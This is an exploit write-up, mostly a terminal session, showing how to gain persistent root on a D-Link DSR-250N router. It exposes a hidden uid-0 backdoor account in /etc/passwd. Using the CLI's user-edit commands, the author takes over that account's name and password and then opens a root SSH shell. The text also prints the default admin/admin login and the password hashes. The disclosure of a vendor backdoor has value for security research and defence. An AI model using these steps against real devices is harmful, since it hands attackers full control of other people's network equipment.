D-Link DSR-250N Backdoor

`D-Link DSR-250N Persistent Root Access  
  
#   
# Router: D-Link DSR-250N  
# Hardware Version: A1  
# Firmware Version: 1.05B73_WW  
#   
# Arch: armv6l, Linux  
#   
# Author: 0_o -- null_null  
# nu11.nu11 [at] yahoo.com  
# Date: 2012-11-25  
#   
# Purpose: Persistently become real root on your D-Link DSR-250N   
# I just wanted to do real firewalling on this   
# cigarette box, but the router software wouldn't  
# let me. So it screamed after getting h@kCz0r3d.  
#   
# Prerequisites: admin access to CLI  
#  
#  
# Here comes the fun stuff... :-)  
#  
# From the default configuration, you can log in via SSH.  
# user: admin, pass: admin  
#   
  
root@bt:~# ssh [email protected]  
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.  
RSA key fingerprint is aa:66:55:ee:cc:66:ff:aa:dd:44:55:00:44:99:33:77.  
Are you sure you want to continue connecting (yes/no)? yes  
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.  
[email protected]'s password:   
  
  
BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
************************************************  
Welcome to DSR-250N Command Line Interface  
************************************************  
D-Link DSR>   
  
.exit Exit this session  
.help Display an overview of the CLI syntax  
.history Display the current session's command line history  
.reboot Reboot the system.  
.top Return to the default mode  
dot11 [Wireless configuration Mode]  
license [License configuration Mode]  
net [Networking configuration mode]  
qos [QoS configuration Mode]  
security [Security configuration mode]  
show Display system components' configuration  
system [System configuration mode]  
util [Utilities Mode]  
vpn [VPN configuration Mode]  
  
D-Link DSR>   
  
#  
# So you get dropped into the CLI. No shellz :(  
# Let's see what we can do from here...  
#  
  
D-Link DSR> util cat /etc/passwd  
root:!:0:0:root:/root:/bin/sh  
ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh  
nobody:x:0:0:nobody:/nonexistent:/bin/false  
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh  
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh  
  
#  
# Ohhh, a backdoor user! Shame on you, D-Link!!!  
# First, I tried to crack the hash. After 24hrs,  
# I dropped that and searched for another way.  
# Turns out that there are more nice functions  
# available in that CLI... ;-)  
#  
  
D-Link DSR> system users edit 1  
users-config[userdb]> username ZX4q9Q9JUpwTZuo7  
users-config[userdb]> password newpass  
users-config[userdb]> password_confirm newpass  
users-config[userdb]> save  
  
#  
# Now, you will have overwritten the first user   
# managed by the D-Link router software. This   
# user is your current admin user. We have given him   
# the username of the backdoor user and set a new   
# password. You might want to add another admin   
# user first and modify that.  
# For this PoC, I just use default one. Let's see  
# what /etc/passwd and /etc/shadow look like now...  
#  
  
users-config[userdb]> util cat /etc/passwd  
root:!:0:0:root:/root:/bin/sh  
ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh  
nobody:x:0:0:nobody:/nonexistent:/bin/false  
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh  
users-config[userdb]> util cat /etc/shadow  
guest:TN08ndVLhlVok:14975:0:99999:7:::  
  
#  
# So, the MD5-Crypt hash has been replaced by a   
# DES-Crypt (unix crypt) hash...  
#  
  
users-config[userdb]> exit  
D-Link DSR> .exit  
Connection to 192.168.10.1 closed by remote host.  
Connection to 192.168.10.1 closed.  
  
#  
# Let's have a taste of the new freedom...  
#  
  
root@bt:~# ssh [email protected]  
[email protected]'s password:   
  
  
BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
DSR-250N> id  
uid=0(root) gid=0(root) groups=0(root)  
DSR-250N> uname -a  
Linux DSR-250N 2.6.31.1-cavm1 #5 Fri Sep 28 11:41:26 IST 2012 armv6l GNU/Linux  
DSR-250N> ls -la /  
drwxr-xr-x 18 root root 0 Jan 1 00:00 .  
drwxr-xr-x 18 root root 0 Jan 1 00:00 ..  
drwxr-xr-x 2 root root 0 Jan 1 00:02 bin  
lrwxrwxrwx 1 root root 5 Jan 1 1970 data -> flash  
drwxr-xr-x 5 root root 0 Jan 1 00:02 dev  
drwxr-xr-x 12 root root 0 Jan 1 00:08 etc  
drwxr-xr-x 4 root root 0 Jan 1 1970 flash  
drwxr-xr-x 2 root root 0 Jan 1 1970 flash_multiboot  
drwxr-xr-x 4 root root 0 Jan 1 00:01 home  
lrwxrwxrwx 1 root root 10 Sep 28 2012 init -> /sbin/init  
drwxr-xr-x 2 root root 0 Jan 1 00:00 lib  
lrwxrwxrwx 1 root root 12 Sep 28 2012 linuxrc -> /bin/busybox  
drwxr-xr-x 3 root root 0 Jan 1 1970 mnt  
drwxr-xr-x 9 root root 146 Sep 28 2012 pfrm2.0  
dr-xr-xr-x 71 root root 0 Jan 1 1970 proc  
drwxr-xr-x 2 root root 0 Sep 28 2012 root  
drwxr-xr-x 2 root root 0 Jan 1 00:01 sbin  
drwxr-xr-x 11 root root 0 Jan 1 1970 sys  
-rw-r--r-- 1 root root 5 Jan 1 00:00 temp  
drwxrwxrwt 4 root root 380 Jan 1 00:09 tmp  
drwxr-xr-x 6 root root 0 Jan 1 1970 usr  
drwxrwxrwt 18 root root 1200 Jan 1 00:03 var  
DSR-250N> df -h  
Filesystem Size Used Available Use% Mounted on  
tmpfs 61.2M 956.0K 60.3M 2% /tmp  
tmpfs 61.2M 932.0K 60.3M 1% /var  
tmpfs 61.2M 0 61.2M 0% /mnt/tmpfs  
/dev/mtdblock3 19.5M 19.5M 0 100% /pfrm2.0  
/dev/mtdblock4 2.1M 504.0K 1.6M 23% /flash  
DSR-250N> echo "r00ted! :-)"  
r00ted! :-)  
DSR-250N> exit  
Connection to 192.168.10.1 closed.  
root@bt:~#   
  
#  
# Your web gui will not work until you reboot your box. Then, log   
# in with the backdoor user and you will have the full admin gui back.  
#  
# By the way, how did they confine us to the CLI in the first place?  
#  
  
DSR-250N> cat /etc/profile   
# /etc/profile  
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib  
PATH=.:/pfrm2.0/bin:$PATH  
CLISH_PATH=/etc/clish  
export PATH LD_LIBRARY_PATH CLISH_PATH  
# redirect all users except root to CLI  
if [ "$USER" != "ZX4q9Q9JUpwTZuo7" ] ; then  
trap "/bin/login" SIGINT  
trap "" SIGTSTP  
/pfrm2.0/bin/cli  
exit  
fi  
PS1='DSR-250N> '  
DSR-250N>   
  
  
`